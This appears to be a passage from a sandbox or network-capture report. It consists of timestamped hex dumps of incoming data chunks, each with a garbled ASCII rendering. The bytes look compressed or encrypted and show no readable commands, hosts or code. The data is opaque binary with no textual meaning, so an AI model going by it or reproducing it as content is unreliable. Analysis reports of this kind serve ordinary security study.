                                                                                                        2022-09-29 12:46:21 UTC11304INData Raw: 65 c9 f3 74 6f 8d 98 6e 1e bb b9 d1 60 fa a3 4d cb f0 1a cd 0c 43 51 24 de 45 2c 12 af 48 7d 9d a1 2d 36 ec 80 cc ee 40 f2 1e 02 fd 25 1d 28 d1 bd b8 fa e7 e0 07 1b dd cb c5 c4 85 7d 42 49 f7 0e 63 a0 59 07 1f 40 82 c5 8d 55 64 97 5f f3 6b b1 ff e8 4b 55 cf 34 11 99 af 88 4e ca 38 f2 b9 87 34 4b 2d 97 c0 8e d2 f8 bd e2 09 eb 2e ad 36 a3 14 1a 8a 6d ec 7f 37 e9 0d e5 d2 28 3b 2c 87 b3 fb 70 57 7e 2b 90 52 90 c3 fb 19 d6 c9 11 7a 33 4d cd d8 bf df 81 4c a9 a0 9f 1b 49 3e e7 26 86 e4 9b ab e0 34 92 49 3f f9 64 52 85 c4 72 e4 17 7d 98 14 c3 33 8d dc 83 e1 fd 86 87 49 e7 53 90 5a ba a4 76 57 ab 34 44 32 f5 ef e5 40 ff 16 48 57 fc 46 0b 3e a0 3f 8f 74 15 1c 5b 13 24 b2 ac a9 7f 37 a6 11 e6 63 5e a2 8c 68 f8 78 15 c4 4a 2e 88 b2 27 cc e6 d6 7b cb f3 6e 83 75 41
                                                                                                        Data Ascii: eton`MCQ$E,H}-6@%(}BIcY@Ud_kKU4N84K-.6m7(;,pW~+Rz3MLI>&4I?dRr}3ISZvW4D2@HWF>?t[$7c^hxJ.'{nuA
                                                                                                        2022-09-29 12:46:21 UTC11320INData Raw: ae 22 fb d9 fd 0e 46 a9 53 08 ff b2 98 a5 2b 01 31 33 96 72 5f c2 68 d3 4c 29 6d 4f 24 ab a3 8c 70 96 c9 2f 56 0f 45 8c 99 12 c8 99 04 19 86 b4 fc 19 9a 88 e2 c2 13 8b 7e 0a 04 7b cc e1 05 80 47 83 62 15 d9 1c f6 67 bd a6 c4 aa 1b 02 44 2d 67 3f 7c 25 a5 eb 90 62 17 f1 91 28 fd 5a 9f ff 9c ef 97 1f 85 0f c9 60 b3 bb e7 b6 d1 31 97 71 8e 76 9c 65 78 b7 6a 8a 45 54 cc c6 c0 29 4f 5f 3c 39 82 a8 72 25 2b 78 38 94 2b 9e b9 0f 2f 09 f3 1b 67 59 d0 5f 24 6e b5 93 d0 4d b9 e8 43 3d 89 3a 4a 8e c0 2d bf bf 6c ee 7c 78 62 4b 1b eb 45 b7 fb ae ac 75 01 a5 0b 5d 18 33 1a 5d d7 53 d9 34 e0 a1 fd bc 16 ee fd c7 af ee 67 d4 77 5b b5 60 66 3b fa 43 be fa 0d 31 89 b0 80 64 a1 ad 38 60 91 6a 7f 3e 78 68 ce 18 c9 39 52 cf 97 ee 95 52 9f da a8 59 28 d0 e3 b2 9b f9 70 92 20
                                                                                                        Data Ascii: "FS+13r_hL)mO$p/VE~{GbgD-g?|%b(Z`1qvexjET)O_<9r%+x8+/gY_$nMC=:J-l|xbKEu]3]S4gw[`f;C1d8`j>xh9RRY(p
                                                                                                        2022-09-29 12:46:21 UTC11336INData Raw: 18 c5 8f fe 53 e5 c6 4e ce c7 38 c8 84 8a 78 79 17 16 00 f3 7a ba 91 1f de 08 fa 19 51 27 03 ad e9 51 19 d4 c7 f4 2c 40 64 00 79 61 db 09 ad 51 bb 47 21 cc 7b cf df 2c c9 cb 2c d4 42 ca 7d 4a 2b ef ef 13 87 54 fb 8b aa 23 ae 94 57 02 d1 41 54 e3 1b 5e ad 2d 76 69 4a 42 c3 15 d0 1d 23 0b 50 66 bd f4 01 83 f7 fe 8c 95 53 b6 33 a8 29 b0 da 71 22 bf 8e 9b 8c 89 44 31 0f a9 00 b2 f5 60 f7 9c b0 1f b9 35 f4 3f b9 17 e8 9f 65 31 1f 10 1d f2 44 df 77 c4 58 2c a4 30 e5 c6 92 49 ed fe 6d bc b5 ce 3f 96 5e b4 5f 22 eb c5 45 84 16 66 83 4a 5d 6f d8 9a 95 bc ea 3b f3 45 b0 fa aa 7b 2d 1c c4 e0 c3 19 4a 84 cb 1c c5 f2 d8 c6 f9 de c3 05 b2 d0 ab 93 3d 26 7a 48 68 73 aa ac 8b 79 c1 01 7f 7f d4 fa 63 e8 34 83 1f 77 1c 2c 27 cc 89 5e ef 6d 2f d2 d9 6b cd d5 1b 4b c2 11 90
                                                                                                        Data Ascii: SN8xyzQ'Q,@dyaQG!{,,B}J+T#WAT^-viJB#PfS3)q"D1`5?e1DwX,0Im?^_"EfJ]o;E{-J=&zHhsyc4w,'^m/kK
                                                                                                        2022-09-29 12:46:21 UTC11352INData Raw: 63 63 08 67 63 94 fa e3 06 56 4f 28 f7 dc 9e 1d 55 b1 e4 cc 05 bf f1 c2 74 92 30 64 ad f4 e3 cf db 63 10 39 db db 02 b7 09 e9 3d 6b 5e ed 9b 31 82 c1 94 f9 81 f6 e5 19 2a 3c 17 5d b3 e8 09 ca 07 6b 3f c1 94 94 e2 37 fa d1 41 9b 0e d3 53 7b 64 89 bd 48 4d 85 0a 5e 48 43 d8 cf 67 22 58 5a 9c fc 78 50 0e 02 ae 31 4c 27 63 9f 3f 68 9a 3f ee 18 c8 e3 87 88 33 e4 42 22 07 7c dc 7c 1a 6c fd 74 a0 85 16 1b 13 bf 8a e7 cf a8 d0 d7 09 eb 57 10 19 7d dd 80 c9 ce c2 7c 2a 7b c9 ed 24 64 7f e8 fa 4f 75 21 c4 63 3b 58 2d ef 0a cd 93 ba 9f 93 a9 5b 36 f9 43 f6 ae b5 e1 cc 5a b5 ea 0c 4f f1 3e 6f 7d 5e 69 67 9f 0e bd e6 b4 47 1b 6e 44 dd f1 8e 93 ca 4f a0 56 3a bf e1 c8 88 1d 1d ed 10 1c fe 7c ea 55 6b a4 15 7b e9 22 44 c6 ff 1b 1f b8 5c 16 a2 dd 66 04 3a 23 8e 48 89 d9
                                                                                                        Data Ascii: ccgcVO(Ut0dc9=k^1*<]k?7AS{dHM^HCg"XZxP1L'c?h?3B"||ltW}|*{$dOu!c;X-[6CZO>o}^igGnDOV:|Uk{"D\f:#H
                                                                                                        2022-09-29 12:46:21 UTC11368INData Raw: e5 54 9e 8a 13 72 69 b2 a3 9c a0 a4 1c 98 75 9b eb f9 10 4d 8b 0e e7 04 01 53 7e 5b 98 99 6c 3d b2 ad f6 09 39 a0 3f 88 73 15 d6 2d 22 69 23 13 96 83 0b c0 03 d4 49 37 a0 f9 bf 6b 7d cd ee 30 6d 18 7a 86 ae 91 be 23 0b be e8 16 11 3c a4 39 87 9c b2 5c 02 12 60 88 fc 88 37 f6 e6 cc b5 de 6d 7b e0 73 cf 4a ac d2 ac cc 6d ab 8d b3 02 2f ec 33 3e 68 34 ad 50 1d 11 60 b3 fb da 87 68 9c bb 26 c8 e7 59 9e 22 e7 bc b2 6f 31 1c f8 be cf 75 4c ba 61 e8 85 81 d8 e1 41 0f 9f 70 5c 6d b7 0c 8f 92 3b 98 63 43 92 ed 8d 33 5b ff 2b 28 a1 89 e8 ea a4 f8 e8 7f 1f 67 af af eb 9f e4 dd 20 32 73 83 e8 61 38 fb 6a d2 62 54 d7 4a d1 ce 54 c2 9d 1e 01 37 e3 6b 61 ce 93 03 72 59 46 11 f8 17 a1 a3 1a 8c 79 e2 12 de 26 89 e0 86 4b d6 50 61 cb de b1 57 77 2c bd a0 c3 e0 a2 72 eb 20
                                                                                                        Data Ascii: TriuMS~[l=9?s-"i#I7k}0mz#<9\`7m{sJm/3>h4P`h&Y"o1uLaAp\m;cC3[+(g 2sa8jbTJT7karYFy&KPaWw,r
                                                                                                        2022-09-29 12:46:21 UTC11384INData Raw: 36 74 64 9a dc 93 e6 e8 17 2a a4 8d ef 09 78 d1 d4 a6 8b 7a 25 7f 7a f8 1f db 8a 14 be 1f 90 fb dd 07 67 16 44 71 01 e1 b5 60 d9 b2 7e 5a 28 82 a1 df 83 9d d4 e3 6b c2 ba dd c7 a1 f7 68 5e 3c 78 f0 13 56 aa 5e a5 40 40 1c 94 4d 0e 74 03 9c 6c 37 73 26 6b 6f 1b d7 cb cf 00 79 cb c4 65 e9 2e 48 26 cd 7e f2 05 65 a7 60 03 fc a4 6e 5a 9c 54 3b 3a bd 00 38 b2 8d 2c ee d2 b6 8a 81 88 7d df 72 20 45 07 66 5d 14 07 bb 6b cd 23 dd 92 e9 89 b8 2a c6 0b c8 1b 43 45 db 4f 7b b1 60 25 97 5b ff b2 e4 09 57 8d 4e 45 e6 41 73 0a 74 a4 fb c2 fd b1 6a 81 63 94 2c 41 d5 bb da 80 04 16 b6 57 e0 27 8c b2 03 c4 ff f2 67 15 b0 69 46 1b 30 67 db 0d 9c d8 e5 b0 8e cb ae dd 07 3b 79 fa c0 f6 7f 94 3d 66 ce b4 dc 36 27 f5 41 c5 35 bd eb fe c2 f4 17 5e 05 51 3b d5 91 c2 87 92 a8 49
                                                                                                        Data Ascii: 6td*xz%zgDq`~Z(kh^<xV^@@Mtl7s&koye.H&~e`nZT;:8,}r Ef]k#*CEO{`%[WNEAstjc,AW'giF0g;y=f6'A5^Q;I
                                                                                                        2022-09-29 12:46:21 UTC11400INData Raw: 3e 48 b9 0d 04 57 78 c1 dc fe a3 fd 37 8b 6d 12 b3 41 ba ef 85 3d 84 fe ca 83 bb b3 1d 28 02 39 e9 d2 4d e3 46 d5 38 20 f8 d4 ea 1e 61 02 f8 b6 83 1b 64 40 87 26 bf 03 74 5f aa 94 97 b4 14 34 d3 83 cc ac 42 a5 d9 d7 c3 72 f3 80 c9 8f 21 c8 7f f3 1e f5 de ce 16 06 34 f9 3d f8 59 db 78 ab 97 a3 c2 25 fc 22 80 c8 03 c7 25 ab 0c 17 e1 75 1c 58 79 fd 8a 95 3b f9 cd 0c 57 ed 74 b6 5f 77 20 01 42 6c 05 f6 f1 1a c2 72 06 cc a6 5e 38 10 b6 78 22 2c 6c 89 3c e8 b8 18 2c e1 78 4a a6 89 56 6e 13 43 0b 8a 97 23 bf 2d 61 98 91 73 63 61 f8 30 90 8a ad 0a 88 78 1c f8 65 02 c0 d4 bc ab 6b 60 60 ff 9e 8c 4f b7 d0 7a b3 93 f7 e1 39 19 15 fa e7 a3 a2 8f f2 27 d1 14 e6 48 eb 45 24 df 54 60 0a f7 ad 02 0c 63 7f 92 c4 44 91 bd 2e 57 e6 fd 6d 79 c8 82 92 d3 09 2f ec 87 31 19 89
                                                                                                        Data Ascii: >HWx7mA=(9MF8 ad@&t_4Br!4=Yx%"%uXy;Wt_w Blr^8x",l<,xJVnC#-asca0xek``Oz9'HE$T`cD.Wmy/1
                                                                                                        2022-09-29 12:46:21 UTC11416INData Raw: 65 87 67 9c 29 ca a5 ac 53 72 c7 7b 2e 5a 04 e9 0f 9a 9c da 97 ce 27 5b 0c 0b cf c5 8d 4a 3d 6b ab c0 8a e1 6c 57 c1 62 9d d1 26 3f 4f d1 34 a8 d5 a6 b9 45 b9 31 ff 9a 5a 55 e8 80 ff 50 9e 0c e5 47 73 e7 b0 da 76 14 44 d6 51 df 9b c0 58 37 f6 6b d3 65 a3 97 74 3f af 01 d4 95 d0 bb dd f4 83 b5 f6 a6 1f b7 39 4e ab 5e d1 b9 a2 b2 ac 03 93 d6 a7 0c f3 4f b9 e3 6b 73 05 71 18 9e 89 0e 97 b3 fc a9 5c 5b fc 3e 4b 84 08 ec 44 78 a3 41 16 fe d9 73 af 7f b5 02 b0 9b 0f 02 18 8d 41 b2 9e 19 4c 67 44 47 f8 aa 14 c5 20 bf 0f bb 51 88 22 5e ed f6 8c 0b 20 85 73 3d a8 b4 e8 d3 04 00 b7 1e 58 de 95 e8 13 67 5d 0f 5f 0b 8b 83 82 8e 28 21 ba 19 27 99 4e 40 6a e7 fe cb 67 82 b0 89 57 fd 1f 25 8c 35 88 fa db 8c f2 d9 0e 8e 63 d1 f0 8f c4 fb cb 80 aa fb 4c f5 5c 08 68 a1 a0
                                                                                                        Data Ascii: eg)Sr{.Z'[J=klWb&?O4E1ZUPGsvDQX7ket?9N^Oksq\[>KDxAsALgDG Q"^ s=Xg]_(!'N@jgW%5cL\h
                                                                                                        2022-09-29 12:46:21 UTC11432INData Raw: 36 23 84 71 44 71 ae 2e bb ff 61 8a 96 6d d1 66 2e 10 a4 ba 98 72 23 05 cf 6e 98 de 09 4f 75 41 71 04 64 94 3d 08 67 a3 1f b8 ff 8f a0 2e dc 7e 89 10 2c 89 b4 a2 5d a9 c5 b0 87 35 34 1e 86 84 26 34 41 10 70 d4 67 bc 19 84 25 52 8a bd de 95 32 19 c3 ee 7c 62 90 a0 68 7a 90 bd 25 91 f0 69 5c 82 df 4f 61 09 2d d1 51 bc 14 d1 a3 b7 97 ee 5f 5d 95 cf db ec 51 44 f3 4d 3c 1e c4 ac 51 d4 72 bd 53 1d ec 53 54 8e d8 db 4c a0 4f 29 20 41 6b a9 05 47 a6 f8 6b 70 b3 4e 0f ef e7 a9 dc 2e 8c 4a 4e 63 c3 da e3 c9 71 4a 70 97 6f 6e e8 7e 19 6a d8 d8 d4 d8 de 0d fc 6b 6e a3 9a f7 ec 66 7c ec 78 f9 01 06 08 2a 8e 5a 4d 37 5e 28 91 21 91 bd 7e 37 f7 9f b3 b0 a9 f2 87 78 28 45 8a 04 0e 45 cd 5b e5 b5 dc e9 d6 ee 4d 0a 28 dc 92 89 cf e8 72 7e 8f 41 1a 19 47 79 ec 39 0d e6 1c
                                                                                                        Data Ascii: 6#qDq.amf.r#nOuAqd=g.~,]54&4Apg%R2|bhz%i\Oa-Q_]QDM<QrSSTLO) AkGkpN.JNcqJpon~jknf|x*ZM7^(!~7x(EE[M(r~AGy9
                                                                                                        2022-09-29 12:46:21 UTC11448INData Raw: d1 65 af 1c f5 3e 34 1f b8 88 ca 76 ba 6b db 72 e1 f4 a3 44 e9 79 05 4c 2c 70 b0 cc bd 12 5a 2e f6 42 e9 37 22 ba d7 ae 29 53 72 17 c4 63 27 3c da 4c dd c7 b8 9d 1c 04 be c7 04 12 ef d9 bf 21 f0 5c 74 2f 98 96 94 f7 1e ad 77 f4 e2 4d 00 6e 0d 06 e3 2a 1d 4b 91 1e e9 7a 6b 32 4f bd c4 6d d5 a0 e7 f7 06 79 b3 eb c0 8b ba 93 f6 07 8d 01 33 b2 9e 42 3c 05 26 6c 08 88 f1 19 e5 a0 4b d5 7c 26 c4 59 a6 7c 0e ea 13 98 21 45 7e f8 fe 91 9d d0 cc a4 61 90 a5 5d 36 6c db 3f e2 2b 53 af 03 48 3c ca bb ce 99 d6 cd b8 e8 3c 06 42 57 c3 03 60 6b d5 5b 2a f7 ca 2a 62 e4 a9 65 f5 6e 39 4a 8a ab aa 8b 03 2b 65 a9 f6 9f 47 f5 31 3e dc 21 24 e2 d2 52 55 2b 47 bb 1c 2f 77 f1 4e 05 e3 22 9a 70 f1 34 66 02 a6 0a 9d 57 e9 e1 df 32 90 fa 10 f1 25 0b 42 e4 a6 3f 93 3b fc b8 69 f1
                                                                                                        Data Ascii: e>4vkrDyL,pZ.B7")Src'<L!\t/wMn*Kzk2Omy3B<&lK|&Y|!E~a]6l?+SH<<BW`k[**ben9J+eG1>!$RU+G/wN"p4fW2%B?;i
                                                                                                        2022-09-29 12:46:21 UTC11464INData Raw: b4 42 f2 5d df 21 92 4a 46 ae 72 5d bf d6 ce 32 63 f3 1a 6c 2c e4 bc 8d 39 77 f9 51 2a bc 75 1e 48 97 55 9c 3d 04 a3 67 96 a9 3f c5 72 e2 f4 b3 04 95 05 52 5c 0e 48 3f 4b 6c b8 a9 29 ec 0a f2 79 ed fd 3f 0c a0 8a 79 73 08 bf 2d c3 5d 8f 15 c2 8e 26 48 06 27 7f 06 cc a8 e3 e9 40 10 06 8b c6 8c 33 4b e7 a1 b9 e3 0e af 42 f6 63 84 37 58 3c 40 24 c0 81 d6 6c da d8 80 78 12 61 fc a3 d9 1f 7d bf 27 38 2d 74 72 96 23 f7 bb 8e 8f 70 93 4f 06 6e a3 25 e2 0d 25 aa 67 87 34 e7 19 26 a4 57 73 c9 14 dd b0 73 c9 eb 0b 5f f5 59 2b 16 62 fa 6e 36 9a 59 0f 92 88 43 c0 3e 93 db 7f 99 f1 43 12 24 1d af 33 69 bd 13 6f d5 4c 68 54 27 30 c5 18 2f c9 28 02 1f 15 ee 4d 23 95 09 c1 5b e4 7d e9 60 e5 c7 33 ba 6d c5 8f 4e c7 fe 83 e0 88 4f 28 ed ab c9 3e 1f b2 4e b5 7d d0 ee 0a cb
                                                                                                        Data Ascii: B]!JFr]2cl,9wQ*uHU=g?rR\H?Kl)y?ys-]&H'@3KBc7X<@$lxa}'8-tr#pOn%%g4&Wss_Y+bn6YC>C$3ioLhT'0/(M#[}`3mNO(>N}
                                                                                                        2022-09-29 12:46:21 UTC11480INData Raw: 6d bb bb 63 f4 3b 38 61 df d4 b9 2d 42 e0 3a 20 ea 8b 8c 4a 1c 73 0e a4 21 5b 5b 73 a5 55 87 08 fb 5a 63 2b 77 48 eb b8 ad d4 b5 75 ec 24 8f 5e 30 ed b9 68 0d 17 9d c8 2c 49 44 38 c5 86 9f c5 c3 c0 8d 0c 2a e6 6c 95 21 7e d6 40 70 d5 59 aa c1 2d 85 09 cd 4c c3 7a 50 5c 47 2f f9 12 85 84 78 31 d0 09 6b db ba 65 7b 3f 95 39 23 d5 51 e8 6a f3 c9 f7 20 c8 7b a0 fc a6 ff 13 ec 93 e8 0e e9 94 b6 13 3d cf dd 83 ee 4b 1b 04 36 74 7c 6d c2 4e bb 3c 7e c4 3e a6 ff 71 ca e4 1d 06 0e f6 80 69 33 9a 85 bd 61 41 e8 c1 f0 6a 7a 32 a0 2c 9a 88 3f 83 85 3a 83 a3 1b 99 53 e4 20 60 67 d6 fc 6b 85 60 36 d5 76 7c 4c d2 1b 3d 8d 16 f2 8e aa 6b 3d e9 0a 26 38 ba 71 a3 d5 9a 0a b9 5a 5d a1 39 df 80 c4 db 12 5d 47 97 ec a1 e2 2b 86 64 8c d8 c0 60 88 33 11 cc ae 17 5b 8c a4 a4 55
                                                                                                        Data Ascii: mc;8a-B: Js![[sUZc+wHu$^0h,ID8*l!~@pY-LzP\G/x1ke{?9#Qj {=K6t|mN<~>qi3aAjz2,?:S `gk`6v|L=k=&8qZ]9]G+d`3[U
                                                                                                        2022-09-29 12:46:21 UTC11496INData Raw: 0f 9a ab c2 08 d1 9d a7 1e 01 3e 51 95 fc 73 a7 7c d2 9d 68 b7 9c 8f 85 5d 44 ae 0e 5d 06 ab 15 f3 94 6b 99 46 da d6 df d1 fc d1 13 54 ef 99 e0 ef 56 cc ad 7e 8b be 39 97 57 95 95 b2 c0 86 9b 0d 26 19 23 6b 34 67 06 ff a8 c0 19 cb 98 16 89 f2 53 98 09 50 68 e2 ed 0c a4 73 1f 65 fd 3e 87 f0 aa e2 f8 4b 7c a4 b7 6b 3e fd a5 ec 58 45 49 97 5d 16 2c 84 8b 27 89 4a 9b 11 02 29 26 b0 e9 e9 50 a7 d5 18 80 4f 91 4d 53 96 48 08 d9 f3 9d 0d 37 94 63 d5 4e 9a ee 14 26 a6 b4 2d 36 1f 8d 46 f0 6d bf e3 89 2a d4 5c 69 e8 45 ba c3 98 0b d2 db 80 f9 50 da be 0a cc 2d dc 31 a2 ec 7d b5 07 92 13 46 57 f8 7f a8 f4 97 d0 22 8c f6 a5 d9 8f 22 dd d4 77 68 73 fd 0a 3b 8b 22 8a f8 46 e8 79 88 fe 0d 20 06 64 1d e9 d2 92 b0 ec 2b 44 3e 12 96 ef 19 0e 75 46 24 53 3c c3 4f 84 7e 73
                                                                                                        Data Ascii: >Qs|h]D]kFTV~9W&#k4gSPhse>K|k>XEI],'J)&POMSH7cN&-6Fm*\iEP-1}FW""whs;"Fy d+D>uF$S<O~s
                                                                                                        2022-09-29 12:46:21 UTC11512INData Raw: 86 d8 a2 f9 e7 b1 cd 29 1d b0 a9 68 ef 3b ca 58 55 33 cc 5a d0 88 1a fe 66 59 63 f4 54 55 c4 33 a1 de a3 1b 06 ca 07 aa 12 bb 96 76 40 dc 80 5b 4e 75 ca 70 13 b2 77 d1 b6 23 c1 c6 b9 92 e3 7d 6b 20 7d d4 96 a6 01 94 48 ec 4f 61 af 52 21 9f 20 59 b3 72 fd d8 81 f9 ac c7 ec 78 06 7c d2 d3 a9 51 ea e5 5c 38 ff e7 39 26 9a be 30 67 98 0a d6 d6 11 85 d7 a0 d2 a7 e8 d6 5d 37 21 94 c7 85 3f 94 a0 50 4c 06 cd bf 8f ac d8 80 8d d9 bc b3 2b 63 d5 86 42 8b 91 70 79 7f 69 de 0c b6 87 60 53 4c c1 76 53 51 07 26 4a 1e d5 b5 d9 55 b2 c8 cf ce 51 fc 0a a7 91 6c db f5 f8 53 48 73 6d 8d c7 72 85 d0 fb 2d cc 98 5e 19 44 09 95 3c 4c d6 e8 83 4b 04 f4 ff 7c 06 92 50 0b b5 82 b8 3b 3c 38 e2 5f 0b 25 e7 62 10 00 c0 61 a4 1a 2d 1c d9 f2 76 fa b8 ff 4e 24 f8 4a 24 09 dd 2c c1 c9
                                                                                                        Data Ascii: )h;XU3ZfYcTU3v@[Nupw#}k }HOaR! Yrx|Q\89&0g]7!?PL+cBpyi`SLvSQ&JUQlSHsmr-^D<LK|P;<8_%ba-vN$J$,
                                                                                                        2022-09-29 12:46:21 UTC11528INData Raw: d4 c3 7e 1c 98 8b dc ee 13 ef 0b 2e d3 4f df d2 cd dd fc 06 ce 82 69 88 7b 3d e8 cb d4 b8 a7 b0 dc 8d d1 a2 1d bf a4 dd 4f 8c f8 fb 13 ba 62 75 b9 d3 33 00 1a 2c 43 b1 f1 68 56 0b e2 36 9c 97 b8 d1 43 b5 3b b0 6c fa a2 d1 cb 97 01 e8 4e 00 1d a2 05 72 20 74 35 96 fd 6f 5b 70 fa d6 9b b4 91 48 e1 7f 97 cc e3 a2 16 e1 dc 05 ad d5 48 2c 14 21 e2 9d 2b ed 6a a8 c1 3f 39 03 e2 8d 42 37 b3 80 ed bd 51 36 07 6a 34 89 6f 1b cf 96 30 35 88 6b 2a e3 8a 41 52 2d c1 30 1a d7 7b 52 73 c9 45 65 ec 04 77 59 1d 40 fc 5a ac 66 8c 5e c5 7f c4 ca 01 06 01 0a 76 35 75 81 94 c6 7b 21 a5 d2 cb 2a 4b 7e 11 67 ba e9 f7 a4 2a 64 2c 4c fd e1 3e 8e a6 f4 ab 7c 80 31 d5 be 92 70 01 85 82 4d eb d2 9a be c6 87 76 94 ae 8b 3e 8f 90 9d 59 28 a8 04 b8 5c 40 42 c7 13 20 d5 76 82 23 2f 87
                                                                                                        Data Ascii: ~.Oi{=Obu3,ChV6C;lNr t5o[pHH,!+j?9B7Q6j4o05k*AR-0{RsEewY@Zf^v5u{!*K~g*d,L>|1pMv>Y(\@B v#/
                                                                                                        2022-09-29 12:46:21 UTC11544INData Raw: 64 6d 3f 33 35 d9 88 30 c5 c8 b0 a2 61 f9 f7 d1 0c cd 0c 23 a8 ad 67 2c 78 17 8e be e6 69 be 63 6a a1 0c b2 38 04 e2 30 9b 5a e2 57 9c a0 a0 03 26 05 f7 e8 f6 b3 02 60 13 75 5e 18 a1 e9 63 29 b0 a9 f0 ed 90 f8 c5 58 8a e4 89 f5 5e 86 42 ff 44 40 2a 5c 46 2e a7 63 85 36 b1 58 34 d1 d5 f9 d6 ba a7 89 55 05 89 e7 c8 9d 07 ba af cc a3 f8 81 80 4c 31 ea ef 44 fe c3 71 16 4e 4b 25 79 93 f5 cc 78 ed 4e 5a ef 75 47 31 fc bc e1 78 1e 49 f3 c1 47 a3 96 3d 54 76 05 cb 57 34 7f 3c 62 fd d6 c4 a2 8f a3 de b3 3a 78 d8 ba 34 4d dc fd b1 4a f6 02 0e fa 4e 14 2b 33 6a 68 ab c1 e3 cd e2 01 ee 8d 4e 91 31 cd 41 70 9d d5 f5 ca 40 9c 3a 3f 72 28 bf bb e2 7f 26 fd 90 94 85 ef 9a 41 a6 d6 aa 05 28 49 80 19 33 5c ca 64 fd 1a 60 29 2a 5d 35 50 e1 f0 ae b4 be 68 83 ad fb a6 8c 7a
                                                                                                        Data Ascii: dm?350a#g,xicj80ZW&`u^c)X^BD@*\F.c6X4UL1DqNK%yxNZuG1xIG=TvW4<b:x4MJN+3jhN1Ap@:?r(&A(I3\d`)*]5Phz
                                                                                                        2022-09-29 12:46:21 UTC11554INData Raw: ac 9d 71 a5 95 65 64 64 1a 43 b6 9c 22 d6 d4 fd 69 e5 52 15 17 45 94 22 d3 d6 65 ce a9 8c 8d 13 af 2d 23 ad 71 25 0f ee 51 0a 96 44 48 fe 34 9f 88 a4 8c 2e 91 70 88 93 aa dc 13 58 1a d6 32 b2 22 62 14 81 72 73 b1 3c 18 10 37 12 35 99 57 1d ef 13 4c b1 a8 f5 f7 74 2a 74 c0 5a 2c 50 b0 97 84 8a 09 48 da 16 50 3b c5 ad 1f 36 64 64 ea 36 5a 38 f3 68 07 bd df 7c 8f 9a 61 4f 45 c3 e2 19 ff d7 af 3b 23 cf 17 43 e7 1a 57 46 75 06 5e ef 47 c1 bc cf a3 46 77 d3 4e a0 cb 6e d2 e9 83 2e 70 f6 1b cc 31 56 9b 09 fa ac 5c 22 20 ef 71 91 3c a5 85 18 62 42 9f 75 e2 fc 54 dc 53 80 79 a9 ce 18 3a 93 dc 91 f1 77 18 a9 18 d2 99 14 2b 53 e0 df 74 8c bc f8 45 ae 43 d0 4c 11 c6 eb 87 a5 e2 5c 99 b6 40 0e b5 ab ec 5d ac 29 09 b9 4e a8 1a ec 37 c6 43 83 01 5f 60 db 46 6e b4 cc b1
                                                                                                        Data Ascii: qeddC"iRE"e-#q%QDH4.pX2"brs<75WLt*tZ,PHP;6dd6Z8h|aOE;#CWFu^GFwNn.p1V\" q<bBuTSy:w+StECL\@])N7C_`Fn
                                                                                                        2022-09-29 12:46:21 UTC11570INData Raw: 87 62 9d 3e ed ea 08 39 8c 66 6b 71 73 95 b4 51 f6 1b 00 54 25 04 5b 13 40 32 64 55 44 0f 37 c8 0d 0f 61 22 d9 ca 6a 32 f3 db 44 32 4b 3e 49 41 d3 e9 cb 6f 3f 0f 56 4c 2d 72 48 a9 ae 3f 8e d5 6a 31 0d 28 52 a9 8b ec 21 9b 6a 59 fe eb c1 7d d8 56 ed bc ea f0 dc ba b9 f6 bd 53 4a 8b e5 a5 cd d2 f1 a5 f6 a5 72 e7 25 21 50 87 73 8f 24 37 a6 9c 50 62 f2 2e 05 fc 90 e9 92 20 ad 0d 0f 49 a8 ca 7d 46 b2 38 79 a8 be e7 b2 f9 69 00 a6 50 c4 78 d1 42 14 c3 69 af ba aa cc a8 ce d1 b4 90 41 b4 12 f8 5f 8a fa 9a 33 82 97 e4 76 b8 3b 55 97 e7 a4 fc 5f db 95 11 ea f1 3c 1f 56 94 d6 c5 53 ea 1a 34 2a 5f 85 74 e5 16 a6 fb d5 f2 ac 55 38 1e a4 8e 1d 48 f1 a8 ce d7 2b 94 ab 81 e6 48 a0 2b 7c 58 68 9c ab 64 f2 c8 9f c5 8c ab 80 7f a8 c4 47 c0 5c 40 d2 a2 a3 2a 4b d1 87 90 a0
                                                                                                        Data Ascii: b>9fkqsQT%[@2dUD7a"j2D2K>IAo?VL-rH?j1(R!jY}VSJr%!Ps$7Pb. I}F8yiPxBiA_3v;U_<VS4*_tU8H+H+|XhdG\@*K
                                                                                                        2022-09-29 12:46:21 UTC11586INData Raw: d0 2e 7f c5 ee 74 65 8b 68 93 02 1c db fe ec 9a e1 76 e2 f8 32 dd b0 3b 05 62 bb f6 c4 95 bb 50 28 81 42 05 fa 23 c0 a4 7d ed 7b b1 8b f3 3c 28 0f 1d 19 5a dd e9 3d 5c e4 5b a5 40 56 8a 7c 67 a0 80 54 d6 65 07 a9 9f 0a 78 3f 9b ce 2d 36 ed 5d 83 34 d8 b5 41 c2 bf f0 c0 8d 35 28 ab 62 69 f8 72 6a bc c9 8a 30 cf 56 3b 70 45 4c f5 bb 42 39 d3 38 f3 81 80 a6 24 85 0a fb cd 3a 3d 3d d0 c3 82 6a 6a 78 2e 4c 87 14 e3 8e 42 c9 34 69 7e d0 3d 60 c7 f4 2b 61 d7 0d d9 87 16 32 64 91 5c 30 a9 45 f3 a8 60 33 1c ca 64 e3 a4 6e 19 ef d5 9b 41 15 de 77 1d 2a 1c 16 1d d1 68 2b 30 6a cd e3 e1 f6 23 a6 27 83 e3 40 b7 44 11 e2 fb 30 f9 29 87 0d 56 68 41 aa 78 33 79 10 5b 2e 24 42 af 9a 0a ec 26 e3 15 8f c9 6b 9b f0 85 aa a6 9b 45 1c a2 07 42 4f e2 02 d9 4d 57 08 c6 46 de bd
                                                                                                        Data Ascii: .tehv2;bP(B#}{<(Z=\[@V|gTex?-6]4A5(birj0V;pELB98$:==jjx.LB4i~=`+a2d\0E`3dnAw*h+0j#'@D0)VhAx3y[.$B&kEBOMWF
